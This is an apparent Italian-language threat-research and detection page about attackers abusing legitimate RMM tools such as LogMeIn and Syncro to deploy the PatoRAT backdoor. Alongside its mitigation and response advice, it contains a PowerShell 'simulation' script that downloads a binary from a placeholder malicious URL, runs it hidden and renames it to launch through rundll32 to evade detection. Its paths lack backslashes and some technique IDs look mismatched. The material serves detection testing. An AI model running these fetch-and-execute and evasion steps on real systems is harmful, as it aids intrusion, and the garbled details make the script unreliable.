SOC Prime Bias: Critico

28 Jan 2026 08:41 UTC

Rilevamento Endpoint dei Casi Recenti di Distribuzione RMM

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Rilevamento Endpoint dei Casi Recenti di Distribuzione RMM
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Gli attori delle minacce stanno abusando sempre più degli strumenti legittimi di monitoraggio e gestione remota (RMM)—come LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne e SuperOps—per distribuire malware e stabilire un accesso remoto persistente. La consegna iniziale avviene spesso tramite pagine di download malevole o email di phishing, seguita dall’esecuzione tramite PowerShell e dal dispiegamento di payload secondari come il backdoor PatoRAT. AhnLab EDR può rilevare l’esecuzione di queste utility RMM e generare avvisi basati sul comportamento riguardo alle attività sospette successive. Il rapporto sottolinea l’importanza di convalidare la provenienza del software e mantenere un monitoraggio continuo degli endpoint.

Indagine

AhnLab Security Intelligence Center ha osservato molteplici campagne in cui gli attaccanti hanno riconfezionato o mascherato gli installer RMM come applicazioni popolari (ad esempio, Notepad++, 7-Zip e Telegram) e li hanno distribuiti tramite siti web malevoli o allegati di phishing. Dopo l’installazione, gli agenti RMM si sono registrati alla loro infrastruttura fornitrice e sono stati poi utilizzati per eseguire payload PowerShell che hanno rilasciato PatoRAT. Attacchi simili sono apparsi su diversi prodotti RMM, incluso Syncro distribuito attraverso phishing con esche PDF. È stata sviluppata una logica di rilevamento AhnLab EDR per segnalare l’esecuzione di questi binari altrimenti legittimi e correlarla con i comportamenti post-installazione.

Mitigazione

Verifica le fonti di download, valida i certificati di firma del codice e confronta gli hash con le versioni del fornitore ufficiali prima di consentire il software RMM nell’ambiente. Enforce elenchi di permessi per le applicazioni e richiedi approvazioni esplicite per l’esecuzione RMM. Monitora l’avvio inatteso di binari RMM, l’attività anomala di PowerShell e le connessioni sospette ai domini dell’infrastruttura del fornitore quando tali strumenti non sono autorizzati. Mantieni i sistemi operativi e gli strumenti di sicurezza aggiornati per ridurre l’esposizione.

Risposta

Quando viene rilevata un’esecuzione RMM sospetta, isola l’host, raccogli artefatti forensi e rimuovi il binario non autorizzato. Blocca le connessioni in uscita alla infrastruttura dello strumento per interrompere i canali di controllo remoto, e esegui una scansione completa per payload secondari come PatoRAT. Aggiorna i contenuti di rilevamento con gli IOC osservati e informa il SOC sui modelli di campagna per un triage più rapido.

Flusso dell’attacco

Esecuzione di Simulazione

Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione dell’Attacco e Comandi:
    Un attaccante invia un’email di phishing contenente un allegato malevolo. L’allegato esegue uno script PowerShell che scarica il binario RMM LogMeIn.exe to C:Temp. Per eludere il rilevamento basato sul nome, l’attaccante rinomina il binario a tool.exe e lo avvia tramite rundll32.exe (T1216). Il binario RMM poi contatta il server C2 controllato dall’attaccante e lascia un payload backdoor. Dopo l’esecuzione, l’attaccante elimina il binario (T1542.004) per coprire le tracce.

  • Script di Test di Regressione:

    # ---------------------------------------------------------------
    # Simula lo sfruttamento dello strumento RMM (nome originale) – dovrebbe attivare
    # ---------------------------------------------------------------
    $rmmPath = "C:TempLogMeIn.exe"
    Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
    Write-Host "[*] Esecuzione del binario RMM originale (ci si aspetta un avviso)..."
    Start-Process -FilePath $rmmPath -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Simula evasione rinominando ed eseguendo via proxy – NON dovrebbe attivare
    # ---------------------------------------------------------------
    $evasionPath = "C:Temptool.exe"
    Rename-Item -Path $rmmPath -NewName "tool.exe"
    Write-Host "[*] Esecuzione del binario RMM rinominato tramite rundll32 (evasione)..."
    $rundll = "$env:SystemRootSystem32rundll32.exe"
    Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Pulisci gli artefatti
    # ---------------------------------------------------------------
    Write-Host "[*] Pulizia dei binari..."
    Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Simulazione completata."
  • Comandi di Pulizia:

    # Assicurarsi che i processi rimanenti siano terminati
    Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Rimuovere eventuali file scaricati (se ancora esistenti)
    Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue